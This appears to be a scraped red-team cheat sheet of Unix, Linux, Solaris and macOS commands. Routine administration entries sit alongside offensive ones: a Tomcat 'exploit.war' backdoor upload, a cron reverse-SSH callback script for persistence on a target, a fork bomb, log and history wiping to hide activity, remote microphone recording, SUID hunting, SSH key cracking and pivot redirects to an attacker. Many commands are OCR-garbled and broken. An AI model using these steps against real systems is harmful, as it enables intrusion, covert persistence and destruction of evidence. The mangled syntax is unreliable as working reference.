Comment on page
Nix
Command | Explanation |
watch ss -tp | Network communication |
netstat -ant | tcp or udp communication -anu=udp |
netstat -tulpn | Communication with PIDs |
lsof -i | Established communication |
smb:// ip /share | smb shared environment access |
share user x.x.x.x c$ | Mount the shared Windows environment |
smbclient -0 user\ ip \ share | Connect to SMB |
ifconfig eth# ip I cidr | Set IP and netmask |
ifconfig eth0:1 ip I cidr | Virtual interface setting |
route add default gw gw lp | Set GW |
ifconfig eth# mtu [size] | Change the MTU size |
export MAC=xx: XX: XX: XX: XX: XX | Change the MAC |
ifconfig int hw ether MAC | Change the MAC |
macchanger -m MAC int | Change Mac in Backtrack |
iwlist int scan | Wi-Fi scanner |
nc -lvvp port | Listening to a specific port |
python3 -m http.server port | Create a web server |
dig -x ip | Identifying the domains of an ip |
host ip | Identifying the domains of an ip |
host -t SRV _ service tcp.url.com | Identification of domain SRV |
dig @ ip domain -t AXrR | Identify DNS Zone Xfer |
host -1 domain namesvr | Identify DNS Zone Xfer |
ip xfrm state list | Show available VPN |
ip addr add ip I cidr aev ethO | Add ‘hidden’ interface |
/var/log/messages I grep DHCP | DHCP list |
tcpkill host ip and port port | Blocking ip:port |
echo “1” /proc/sys/net/ipv4/ip forward | Enable IP Forwarding |
echo ‘‘nameserver x.x.x.x’’ /etc7resolv.conf | Add DNS server |
showmount -e ip | Show mounted points |
mkdir /site_backups; mount -t nfs ip:/ /site_backup | mount route shared by ip |
Command | Explanation |
nbstate -A -ip | Get hostname for ip |
id | Current username |
w | Logged in user |
who -a | User information |
last -a | The last logged in user |
ps -ef | Available system processes (or use top) |
df -h | The amount of disk usage (or using free) |
uname -a | Show the kernel version along with the processor structure |
mount | Mount the file system |
getent passwd | Display the list of users |
PATH~$PATH:/home/mypath | Add variable to PATH |
kill pid | Kill process with pid |
cat /etc/issue | Display operating system information |
cat /etc/’release’ | Display operating system version information |
cat /proc/version | Display kernel version information |
rpm –query -all | Installed packages (in Redhat) |
rpm -ivh ‘ .rpm | Installing rpm packages (to remove -e=remove) |
dpkg -get-selections | Installed packages (in Ubuntu) |
dpkg -I ‘.deb | Install DEB packages (to remove -r=remove) |
pkginfo | Installed packages (on Solaris) |
which tscsh/csh/ksh/bash | Display the paths of executable files |
chmod -so tcsh/csh/ksh | Disabling shell and also forcing to use bash |
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \; | Finding files with suid |
find / -uid 0 -perm -4000 -type f 2>/dev/null | Finding files with suid |
find / -writable ! -user whoami -type f ! -path “/proc/” ! -path “/sys/” -exec ls -al {} \; 2>/dev/null | Show writable files |
Command | Explanation |
python -c “import pty;pty.spawn(‘/bin/bash’)” | Shell interactive |
wget http:// url -0 url.txt -o /dev/null | Get the address |
rdesktop ip | Access to desktop ip |
scp /tmp/file [email protected]:/tmp/file | Send file |
scp user@ remoteip :/tmp/file /tmp/file | Get the file |
useradd -m user | added by the user |
passwd user | Change user password |
rmuser unarne | Delete user |
script -a outfile | Loose recording: Ctrl-D to stop |
apropos subject | Related commands |
History | History of user commands |
! num | Executive lines in history |
ssh2john.py id_rsa > ssh-key | Find the passphrase |
john ssh-key | Find the passphrase |
ssh -i id_rsa user@ip | Connect with key and passphrase |
id -u | Get user id |
cut -d: -f3 < <(getent group GROUPNAME) | Get group id |
curl -G ‘http://example.com/file.php’ –data-urlencode ‘cmd=echo ssh-rsa AA………..’ | Sending information with the get method in curl |
curl –user ‘tomcat:$3cureP4s5w0rd123!’ –upload-file exploit.war “http://megahosting.com:8080/ma | |
nager/text/deploy?path=/exploit.war” | Create backdoor with lfi vulnerability in java |
collection of lines
Command | Description |
|---|---|
diff file file2 | Compare two files |
rm -rf dir | Forced deletion of folders nested |
shred -f -u file | Rewrite or delete the file |
touch -r ref file | Adapting timestamp related to ref_file |
touch -t YYYYMMDDHHSS file | set file timestamp |
sudo fdisk -1 | List of connected drivers |
mount /dev/sda# /mnt/usbkey | Mounting usb devices |
md5sum -t file | md5 crisp accounting |
echo -n "str" | md5sum | Generate md5 hash |
shalsum file | The SHAl hash of the file |
sort -u | Relating and displaying unique lines |
grep -c ''str'' file | |
grep -Hnri word * | vim - | Search for the desired word in files along with the file name |
grep -rial word | Files containing the desired word |
tar cf file.tar files | Create .tar from files |
tar xf file.tar | Extract .tar |
tar czf file.tar.gz files | Create .tar.gz |
tar xzf file.tar.gz | Extract .tar.gz |
tar cjf file.tar.bz2 files | Create .tar.bz2 |
tar xjf file.tar.bz2 | Extract .tar.bz2 |
gzip file | Compress and rename the file |
gzip -d file. gz | Not compressing file.gz |
upx -9 -o out.exe orig.exe | Get UPX packs related to orig.exe |
zip -r zipname.zip \Directory\' | Create zip |
dd skip=lOOO count=2000 bs=S if=file of=file | Separate 1 to 3 KB from the file |
split -b 9K file prefix | Separation of 9 KB sections from the file |
awk 'sub("$"."\r")' unix.txt win.txt | Windows compatible txt file |
find -i -name file -type '.pdf | Search for PDF files |
find I -perm -4000 -o -perm -2000 -exec ls - ldb {} \; | Search setuid files |
dos2unix file | Switch to *nix format |
file file | Determine the file type and format |
chattr (+/-)i file | setting or not setting the immutable bit |
while [ $? -eq 0 ]; do cd flag/; done | Enter infinite nested folder |
Command | Explanation |
unset HISTFILE | Disable reports in history |
ssh user@ ip arecord - I aplay - | Remote microphone recording |
gcc -o outfile myfile.c | Compile C, C++ |
init 6 | Restart (0 = shutdown) |
cat /etc/ 1 syslog 1 .conf 1 grep -v ‘’”#’’ | list of report files |
grep ‘href=’ file 1 cut -d”/” -f3 I grep url | sort -u | Separation of links url.com |
dd if=/dev/urandom of= file bs=3145728 count=100 | Create a 3 MB file |
Command | Explanation |
echo “” /var/log/auth.log | Delete the auth.log file |
echo ‘’’’ -/.bash history | Delete the session history of the current user |
rm -/.bash history/ -rf | Delete the file .bash_history |
history -c | Delete the session history of the current user |
export HISTFILESIZE=0 | Setting the maximum lines of the history file to zero |
export HISTSIZE=0 | Setting the maximum number of commands in the history file to zero |
unset HISTFILE | delete history (need to log in again to apply) |
kill -9 $$ | Delete the current meeting |
ln /dev/null -/.bash_historj -sf | Permanently send all history commands to /dev/null |
Position | Explanation |
/bin | System binary files |
/boot | Files related to the boot process |
/dev | Interfaces related to system devices |
/etc | System configuration files |
/home | A basic place for users and libraries |
/opt | Essential software libraries |
/proc | Executive and systemic processes |
/root | The base path for the root user |
/sbin | executable files of the root user |
/tmp | Temporary files |
/usr | Not very necessary files |
/var | System variables file |
File | Explanation |
/etc/shadow | Hash of local users |
/etc/passwd | Local users |
/etc/group | Local groups |
/etc/rc.d | Startup services |
/etc/init.d | Services |
/etc/hosts | List of hostnames and IPs |
/etc/HOSTNAME | Show hostname along with domain |
/etc/network/interfaces | Network communication |
/etc/profile | System environment variables |
/etc/apt/sources.list | list of ubuntu distribution sources |
/etc/resolv.conf | namserver settings |
/horne/ user /.bash history | bash history (also in /root/) |
/usr/share/wireshark/manuf | MAC Manufacturer |
-/.ssh/ | Location of ssh keystores |
/var/log | System reports file (for Linux) |
/var/adrn | System reports file (for Unix) |
/var/spool/cron | List of files in cron |
/var/log/apache/access.log | Apache communication reports |
/etc/fstab | Fixed system information file |
sudo apt install gss-ntlmssp
sudo apt-get install powershell
pwsh
$offsec_session = New-PSSession -ComputerName 10.10.10.210 -Authentication Negotiate -Credential k.svensson
Enter-PSSession $offsec_session
New-Item -ItemType Junction -Path 'C:\ProgramData' -Target 'C:\Users\Administrator'
for x in {1 .. 254 .. l};do ping -c 1 1.1.1.$x lgrep "64 b" lcut -d" "-f4 ips.txt; done
#!/bin/bash
echo "Enter Class C Range: i.e. 192.168.3"
read range
for ip in {1 .. 254 .. l}; do
host $range.$ip lgrep " name pointer " lcut -d"
done
: (){:|: & };:
for ip in {1 .. 254 .. 1}; do dig -x 1.1.1.$ip | grep $ip
dns.txt; done
#!/bin/sh
# This script bans any IP in the /24 subnet for 192.168.1.0 starting at 2
# It assumes 1 is the router and does not ban IPs .20, .21, .22
i=2
while
$i -le 253 l
do
if [ $i -ne 20 -a $i -ne 21 -a $i -ne 22 ]; then
echo "BANNED: arp -s 192.168.1.$i"
arp -s 192.168.1.$i OO:OO:OO:OO:OO:Oa
else
echo "IP NOT BANNED: 192.168.1.$i"
fi
i='expr $i +1`
done
Set up script in crontab to callback every X minutes.
Highly recommend YOU
set up a generic user on red team computer (with no shell privs).
Script
will use the private key (located on callback source computer) to connect
to a public key (on red team computer). Red teamer connects to target via a
local SSH session (in the example below, use #ssh -p4040 localhost)
#!/bin/sh
# Callback: script located on callback source computer (target)
killall ssh /dev/null 2 &1
sleep 5
REMLIS-4040
REMUSR-user
HOSTS=''domainl.com domain2.com domain3.com''
for LIVEHOST in SHOSTS;
do
COUNT=S(ping -c2 $LIVEHOST | grep 'received' | awk -F','{ print $2 } '
| awk ' ( print $1 | ')
if [ [ $COUNT -gt 0 ] ] ; then
ssh -R $(REMLIS}:localhost:22 -i
"/home/$(REMUSR}/.ssh/id rsa" -N $(LIVEHOST} -1 $(REMUSR}
fi
Use iptable for ipv6
Command | Description |
|---|---|
iptables-save -c file | Extract iptable rules and save to file |
iptables-restore file | retrieving iptables rules |
iptables -L -v --line-numbers | List of all rules with their line number |
iptables -F | Restart all rules |
iptables -P INPUT/FORWARD/OUTPUT ACCEPT/REJECT/DROP | Policy change if rules are not met |
iptables -A INPUT -i interface -m state --state RELATED,ESTABLcSHED -j ACCEPT | Allow connections made on INPUT |
iptables -D INPUT 7 | Remove 7 layers of inbound rules |
iptables -t raw -L -n | Increase productivity by disabling statefulness |
iptables -P INPUT DROP | Delete all packets |
iptables -A OUTPUT -o iface -p tcp --dport 22 -m state --state
NEW,ESTABLISHED -j ACCEPT
iptables -A INPUT -i
iface -p tcp --sport 22 -m state --state
ESTABLISHED -j ACCEPT
iptacles -A OUTPUT -i iface -p icmp --icmp-type echo-request -j ACCEPT
iptables -A INPUT -o iface -p icmp --icmp-type echo-reply -j ACCEPT
echo "1" /proc/sys/net/ipv4/lp forward
# OR- sysctl net.ipv4.ip forward=1
iptables -t nat -A PREROUTING -p tcp -i ethO -j DNAT -d pivotip --dport
443 -to-destination attk ip :443
iptables -t nat -A POSTROUTING -p tcp -i eth0 -j SNAT -s target subnet
cidr -d attackip --dport 443 -to-source pivotip
iptables -t filter -I FORWARD 1 -j ACCEPT
iptables -A INPU~ -s 1.1.1.0/24 -m state --state RELATED,ESTABLISHED,NEW
-p tcp -m multipart --dports 80,443 -j ACCEPT
iptables -A INPUT -i ethO -m state --state RELATED,ESTABLISHED -j ACCEPT
iptables -P INPUT DROP
iptables -A OUTPUT -o ethO -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -N LOGGING
iptables -A INPUT -j LOGGING
iptables -A LOGGING -m limit --limit 4/min -j LOG --log-prefix "DROPPED "
iptables -A LOGGING -j DROP
Check and create launcher
Command | Description |
|---|---|
service --status-all | [+] Service starts at boot [-] Service does not start |
service service start | start service |
service service stop | stop service |
service service status | Check service status |
update-rc.d -f service remove | Remove the existing system startup service (-f for the /etc/init.d file if it already exists) |
update-rc.d service defaults | Added service in system startup |
Available in red hat distributions such as centos and oracle
Command | Explanation |
chkconfig –list | List of available services and implementation status |
chkconfig service -list | The status of a service |
chkconfig service on [–level 3] | Adding the service [Its layer can also be specified] |
chkconfig service off [–level 3] e.g. chkconfig iptables off | Remove the service |
Command | Explanation |
screen -S name | Create a new screen with the name |
screen -ls | List of running screens |
screen -r name | Addition to screen with the name |
screen -S name -X cmd | Send command to screen with the name |
C-a? | List of key combinations (help) |
C-a d | Addition removal |
C-a D D | Removal of joining and leaving |
C-a c | Create a new window |
C-a C-a | Switch to the last window |
C-a ‘num|name | Switch to the window named |
C-a “ | Show window list and changes |
C-a k | Delete the current window |
C-a S | Horizontal separation of the display |
C-a V | Vertical separation of the display |
C-a tab | Jump to the last screen |
C-a X | Delete the current section |
C-a Q | Delete all sections except the current section |
xwd -display ip :0 -root -out /tmp/test.xpm
xwud -in /tmp/test1.xpm
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg
xwd -display 1.1.1.1:0 -root -silent -out x11dump
Read dumped file with xwudtopnm or GIMP
tcpdump -i ethO -XX -w out.pcap
tcpdump -i ethO port 80 dst 2.2.2.2
tcpdump -i ethO -tttt dst 192.168.1.22 and not net 192.168.1.0/24
tcpdump -i ethO 'icmp[icmptype] == icmp-echoreply'
tcpdump -i ethO -c 50 -tttt 'udp and port 53'
wmis -U DOMAIN\ user % password //DC cmd.exe /c command
# Mounts to /mnt/share. For other options besides ntlmssp, man mount.cifs
mount.cifs // ip /share /mnt/share -o
user=user,pass=pass,sec=ntlmssp,domain=domain,rw
apt-get update
apt-get upgrade
https://github.com/rebootuser/LinEnum
Example: ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t
https://github.com/DominicBreuker/pspy
For example: ./pspy64 -pf -i 1000
Command | Explanation |
pfSsh.php | Shell pfSense |
pfSsh.php playback enableallowallwan | Allowing connections to inbound connections on the WAN (Adding hidden rules to WAN rules ) |
pfSsh.php playback enablesshd | Enable inbound/outbound ssh |
pfctl -sn | Show NAT rules |
pfctl -sr | Show filter rules |
pfctl -sa | Show all rules |
viconfig | Edit settings |
rm /tmp/config.cache | Target cache (or backup) settings after its execution |
/etc/rc.reload_all | Reload the entire configuration |
Command | Explanation |
ifconfig -a | List of all interfaces |
netstat -in | List of all interfaces |
ifconfig -r | List of routes |
ifconfig eth0 dhcp | Start DHCP in user |
ifconfig eth0 plumb up ip netmask nmask | IP setting |
route add default ip | Gateway setting |
logins -p | List of users and passwords |
svcs -a | List of all services along with status |
prstat -a | Status of processes (also command top) |
svcadm start ssh | Start the SSH service |
inetadm -e telnet (-d for disable) | telnet activation |
prtconf I grep Memorj | Total physical memory |
iostat -En | Hard disk size |
showrev -c /usr/bin/bash | Binary information |
shutdown -i6 -g0 -y | Restart the system |
dfmounts | List of users connected to NFS |
smc | GUI management |
snoop -d int -c pkt # -o results.pcap | Packet recording |
/etc/vfstab | Mounted system file table |
/var/adm/logging | Reports list of login attempts |
/etc/default/’ | Default settings |
/etc/system | Kernel modules and settings |
/var/adm/messages | syslog path |
/etc/auto ‘ | Automounter settings file |
/etc/inet/ipnodes | IPv4 and IPv6 hosts files |
File | Description |
~/.viminfo | vim editor file |
Command | Explanation | |
top | shows real-time system statistics including CPU usage, memory usage, and running processes. | |
ps aux | displays a list of running processes with their associated details. | |
netstat | displays active network connections, routing tables, and a number of network interface and protocol statistics. | shows all active network connections and which processes are using them.displays a list of running processes with their associated details. |
tcpdump | allows the capture and analysis of network traffic. | |
tail -f /var/log/system.log | displays real-time updates to the macOS system log. | |
log show –predicate ‘process == “PROCESS_NAME”’ –info | displays system log entries for a specific process. | |
fs_usage | shows real-time file system activity, including which files are being accessed and by which processes. | |
fseventer | displays a graphical representation of file system activity. |